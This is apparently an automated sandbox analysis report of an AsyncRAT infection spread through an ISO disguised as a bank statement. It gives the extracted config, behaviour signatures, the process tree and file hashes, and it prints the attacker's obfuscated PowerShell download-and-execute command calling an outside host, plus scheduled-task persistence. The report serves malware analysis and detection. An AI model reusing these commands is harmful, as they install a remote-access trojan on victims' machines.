Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/07/2024, 21:49

General

  • Target

    Statment#924869506.iso

  • Size

    1.4MB

  • MD5

    4b0aa2a63703f774aa8687300200a04d

  • SHA1

    af1118e88a4aad29bbc8760ed2f1b7a7a5017042

  • SHA256

    8dda70b17eda9096c62343eec5f60a3ed132f66a6f3d2e58c39afbad7280e9bc

  • SHA512

    ab280a85edbec30283be854fc1ebce7936561ffc00d0108411f65e4b6508c586875448db31c78686275c9aeae2aba5649ff6acafc73047608ebc269190e84bdc

  • SSDEEP

    384:6BP01dUB7P1dUB7OpnIUAkgko0oUQEwEo0i5UAEgEo0oUwkQko0IUAkgko0oUQEu:6d01dE7P1dE7OpCAtVAi

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Elsa3eed

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/C7vDhgZQ

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Statment#924869506.iso
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:4188
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2176
    • C:\Windows\System32\Notepad.exe
      "C:\Windows\System32\Notepad.exe" E:\Statment#014095818.wsf
      1⤵
      • Enumerates connected drives
      PID:4344
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
      1⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Enumerates connected drives
      • Suspicious use of WriteProcessMemory
      PID:4148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2260
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
          3⤵
            PID:3652
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
              PID:1836
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4820
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
          1⤵
          • Checks computer location settings
          • Enumerates connected drives
          • Suspicious use of WriteProcessMemory
          PID:2348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1912
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3540
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2
              3⤵
                PID:1876
          • C:\Windows\System32\WScript.exe
            C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
            1⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2408
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4792
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                3⤵
                  PID:3504

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              f41839a3fe2888c8b3050197bc9a0a05

              SHA1

              0798941aaf7a53a11ea9ed589752890aee069729

              SHA256

              224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

              SHA512

              2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\011011101110100000010101010001110010010101101110111010000001010[1]

              Filesize

              5KB

              MD5

              b1a2ef3cb17547bd40e90d8d5df339f9

              SHA1

              5b47f0796d0526025e58843e76355237e9ae7bb9

              SHA256

              ff47b96082b5aa66043090a8e902b85e04bd6355b0c2d031b6b26b64e5d3ce7f

              SHA512

              393bd4b01405d9c91478adfcb132f1ba194a4b166649d5bf5d0b385f48edfa6268869ec21ba3c8734566008688b386c63855a9b66a1fd810a7e8048a1524dcde

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              6fe7f2ff9f024b0658a4113e39b826fc

              SHA1

              07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

              SHA256

              e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

              SHA512

              64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              3aeb291817e68548c1769a0a696b593e

              SHA1

              a7c09a946b1c0ea9d8891b58c162b1e2920b0cec

              SHA256

              dbe7bbb781971a705434da18b898aafd5d63247cda23fe34c4080f1a8760b74e

              SHA512

              7602ca1281ffde573be783369a975dfe6fef6a4fe00738f162cef29ce8115b8b5c1297855ae2707e1aabad158cd154cc3f893d3c66e4ef0cf4d5b48a1c36873c

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              856B

              MD5

              ec4f2ab7f8d5f6be729ff9dfaa5c6a70

              SHA1

              760c281609a80d3b0a3d023aafb9d96da7b16e8e

              SHA256

              1eec5a02da8a948b0f3d762ca05eaca1efd32c7af3ea0536b6cf905e27aef3e7

              SHA512

              773feafee4ad24d1965c625219d730b19a7a0c3e8d650c5a1d102dfd1c6f5e9433c4f2583ead095812faf91ed87c45a3d4299f61474dc2fc762382a31e1b0562

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1pjxfaga.oxi.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml

              Filesize

              1KB

              MD5

              26913303151afee791eb652db6764fe2

              SHA1

              49418253140caeacb2a1b5bfac48f4bc8e8d5b24

              SHA256

              14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248

              SHA512

              5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

            • C:\Users\Public\Music\TvMusic.music

              Filesize

              452KB

              MD5

              6c396a8cfe36cbdc7eb72c2f6c8b2346

              SHA1

              6078599b7406607c848e56e162ea79a691a2aff4

              SHA256

              9f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8

              SHA512

              7a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b

            • C:\Users\Public\Music\TvMusic.vbs

              Filesize

              229B

              MD5

              66a1516e1d1e821084441211567d2e87

              SHA1

              0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

              SHA256

              d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

              SHA512

              1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

            • memory/2132-66-0x00000176203A0000-0x0000017620562000-memory.dmp

              Filesize

              1.8MB

            • memory/2132-4-0x000001761DBE0000-0x000001761DC02000-memory.dmp

              Filesize

              136KB

            • memory/2132-67-0x0000017620AA0000-0x0000017620FC8000-memory.dmp

              Filesize

              5.2MB

            • memory/3436-28-0x0000022BC7230000-0x0000022BC723C000-memory.dmp

              Filesize

              48KB

            • memory/4820-47-0x0000000005D70000-0x0000000005E02000-memory.dmp

              Filesize

              584KB

            • memory/4820-48-0x00000000069F0000-0x00000000069FA000-memory.dmp

              Filesize

              40KB

            • memory/4820-46-0x0000000006020000-0x00000000065C4000-memory.dmp

              Filesize

              5.6MB

            • memory/4820-45-0x00000000057D0000-0x000000000586C000-memory.dmp

              Filesize

              624KB

            • memory/4820-44-0x0000000005340000-0x00000000053A6000-memory.dmp

              Filesize

              408KB

            • memory/4820-70-0x0000000007520000-0x0000000007596000-memory.dmp

              Filesize

              472KB

            • memory/4820-71-0x00000000075A0000-0x000000000765C000-memory.dmp

              Filesize

              752KB

            • memory/4820-72-0x00000000076A0000-0x00000000076BE000-memory.dmp

              Filesize

              120KB

            • memory/4820-74-0x00000000076C0000-0x00000000076CA000-memory.dmp

              Filesize

              40KB

            • memory/4820-29-0x0000000000400000-0x0000000000416000-memory.dmp

              Filesize

              88KB